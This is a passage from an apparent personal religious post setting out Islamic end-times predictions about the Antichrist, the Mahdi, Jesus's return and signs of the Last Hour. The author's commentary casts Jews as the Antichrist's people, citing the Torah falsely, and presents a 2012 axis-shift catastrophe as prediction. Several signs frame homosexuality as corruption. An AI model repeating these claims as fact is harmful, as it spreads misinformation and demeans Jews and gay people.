    2- Major catastrophe that will kill 2/3 of the world’s population. The continents will move and due to the massive changes plants, animals and human life will die off in large numbers. There will be not much food. It is possible that this will happen in the year 2012 but nothing in the Islamic texts confirms this. The only possible sign is that there are no predictions made in Islam beyond the year 2000. Either a meteorite or some sort of energy pull that will cause a shift in the earth axis. This will cause the “sun to come our from the west” (see bellow predictions). Take a globe and flip is upside sown – you will see that the sun will come out form the west. At this time also there will be constant daylight as the earth tilts and moves into the new axis position. As you know Muslims pray 5 times a day. Prophet Muhammad indicate to people that at this time they should break up the day in equal portions and maintain their scheduled prayers.

    3- The appearance of the ANTICRHIST. In Islamic terminology it is called the DJALL or LIAR or DECEIVER. This individual will be a Jew whose father will be a Rabbi, he will be blind from one eye and the remaining eye will stick out like a grape. He will have extraordinary powers that will make people believe he is god. He can only be killed by Jesus (a.s.) He will be born in or around the Arabian Penninsula. The fact that he will be Jewish is pointed out in the Torah (Old Testament in the Bible) – Prince of The Israelites and the Islamic texts point out that his main followers will be Jews.
    Due to his miraculous powers he will be taken by most of the Jewish and Christian people as the Messiah. As you know Evangelical Christians are waiting for the Messiah once Israel is established. Any one will be able to identify him because he will only support evil actions. Significant amount of Muslims will leave their Faith to also join him a believe in him. It is predicted that a Muslim will believe in the morning and disbelieve in the evening and a non believer will not believe in the morning and believe in the evening. The only people who will oppose him will be a small number of believing Muslims. The Muslims will be persecuted by the ANTICHRIST who will present them as an evil force (sounds familiar?). He will claim he is himself god. The reason for people following him is that due to the amount of turmoil, war, and killings many people will stop believing in God and be angry at Him (as opposed to blaming ourselves for our own corrupt ways). They will look at this individual as their saviour who will have power to produce some food or water for them. Anyone who follows or worships the ANTICHRIST will be cursed to Hell by God.

    4- In the Arabian Peninsula an individual will appear. In the Islamic predictions his name is MEHDI (IMAM MEHDI r.a.). He will gather the Muslims who oppose the ANTICHRIST and fight him. For MEHDI and the opposing forces it will be an ongoing loosing battle. Muslims will be defeated in the East and then the West. The ANTICHRIST will come to the walls of Mecca and Medina but he will not be able to enter them.

    5- Jesus (a.s.) will descend in Jerusalem. In the Islamic belief Jesus is not crucified, but God replaced him in the cross with another individual and took up to Heaven Jesus (a.s.). One of the main predictions in relation to Jesus (a.s.) is that his descend will be witnessed by EVERYBODY. He will declare his condition as a Prophet and not God. People will turn away from the ANTICHRIST. Jesus (a.s.) will kill the ANTICHRIST at one of the gates of Jerusalem.

    6- Once this happens the people of Gog and Magog will come out. They will be all killed. Peace and prosperity will then descend upon the whole world where Jesus (a.s.) will be the leader of all people. At this point Jesus (a.s.) will marry and have a family.

    7- Jesus (a.s.) will die. Then, all good people will be taken up by God through a wind that will descend and kill them. Only corrupt, unbelieving people will remain. Then end of the wold will then come and Judgment Day.

     

     

    These are SIGNS related to the end of times according to Islamic sources:

    Wild animals will be gathered into captivity and kept in collections in pens and cages.

    Murder will be considered a minor act.

    Men will get payment for their reproductive organs (artificial fertilization).

    Reducing weights and measures of goods will be a means of increasing profits.

    The person earning a proper and lawful livelihood will be scorned and the person earning his living from unfair means will be admired.

    The main purpose in life will be earning and enjoying.

    Aphrodisiacs will be used to strengthen the body for sodomy.

    Usury will gain solid ground.

    Adultery will be commonplace.

    The murder victim will not know why he is murdered and the killer will not know why he killed.

    Mansions like palaces will be constructed.

    Bribery will become like a custom.

    There will be no regard for the ties of relationship.

    Murder will increase.

    Fools will be made rulers.

    Forbearance will be called cowardice and weakness.

    Ministers of government will be liars.

    The practice of divorce will increase.

    A liar will be considered an acceptable witness.

    Homosexuality will be openly practiced.

    Good people will keep silent fearing others’ foul speech.

    Goodness and evil will be viewed from the same perspective.

    Young boys will be used like women on payment.

    Unworthy persons will meddle in affairs of state.

    Men will keep their hair in a ladylike manner.

    The governors will consider the wealth of the people as their own and they will attack the morality of women.

    Governments will stockpile grains to maintain prices.

    Government will be entrusted to those unworthy of it.

    The earth will vomit oblong pieces of its liver like columns of gold and silver. The murderer will come and say “I killed for this,” and the deserter will come and say “I deserted my family for this,” and the thief will come and say “My hand has been cut off for this.”

    The Euphrates will disclose a mountain of gold over which people will fight. Ninety-nine out of each hundred will be killed and every one of them will say “Maybe I will be the one who will escape.”

    The Last Hour shall not occur until wealth will increase among you and become enormous, until a man takes out the charity due from his wealth but will find none to accept it, until the land of the Arabs becomes meadows and rivers.

    The Last Hour shall not occur until wealth will increase among you and become enormous, and the owner of wealth will search for one entitled to the charity due on it; and he will present it and the person to whom it will be presented will say “I have no need of it;” and barefooted shepherds will compete with each other in the building of tall buildings.

    The slave girl will give birth to her owner .

    ABOUT THE MUSLIMS IT HAS BEEN PREDICTED:

    You will follow the practices of those who were before you, step by step, foot by foot, so much so that if one of them goes into the hole of a lizard you will follow.

    God will take up the knowledge, not by removing it from the minds of people, but by taking possession of the knowledgeable. Then the people will call on the ignorant to inform them, and they will go astray and lead astray.

    The people will get up in the morning to carry on trade and there will be hardly anyone who will fulfill their bargain. It will be said “There is a trustworthy man in so and so;” and it will be said of a man “How wise is he! How skillful is be! How resolute is he,” while in his heart there will be no faith even to the grain of a mustard seed.

    It is near that the nations will call one another against you just as diners call one another to their dishes. You will be numerous, but you will be so much rubbish like the rubbish of a flood. God will take away the fear of you from the minds of your enemies and will put weakness in your hearts, from love for this world and dislike of death.

    Wait for the last Hour when allegiance will be destroyed. Wait for the Hour when rule will be entrusted to those who will be unworthy of it.

    The Hour shall not occur until time contracts. A year will go by like a month, a month like a week, a week like a day, a day like an hour and an hour like the kindling of a fire.

    Time will become short, learning will come to an end, troubles will appear, miserliness will be cast in the hearts, and murder will increase.

    The first of the signs to appear will be the rising of the sun in its place of setting and the coming forth of the beast in the morning. Whichever of them comes first will soon be followed by the other.

    Let him who hears of the dajjal go far from him, for I swear by God that a man will go to him thinking he is a believer and follow him because of confused ideas which he rouses in him.

    The Smoke; the Dajjal; the Beast; the rising of the sun in its place of setting; the descent of Jesus son of Mary; Gog and Magog; three earthquakes — one in the East, one in the West, and one in Arabia; and a fire which will drive mankind to their place of assembly.

    The least of the signs of the last hour will be a fire which will gather mankind from the east to the west.

    ABOUT THE ANTI CHRIST (DJALL IN ISLAMIC TERMINOLOGY):

    There is no prophet who has not warned his people about the one-eyed liar. I tell you that he is one-eyed, but your Lord is not one-eyed. On his forehead are the letters “k,” “f,” “r.” (KUFAR means UNBELIEVER IN GOD)

    He is one-eyed, and will bring with him something like paradise and hell, but what he calls paradise will be hell. I warn you as Noah warned his people about him.

     

    ———————————————————————–

    Brothers & Sisters;

    Regardless of the end of times, our own “individual end of times” comes when we die. We must move forward to change.
    We have to get ready to account for our actions in this world in front of GOD.
    We MUST work together regardless of religion to bring justice and peace to this world.

    Peace.

    T.Z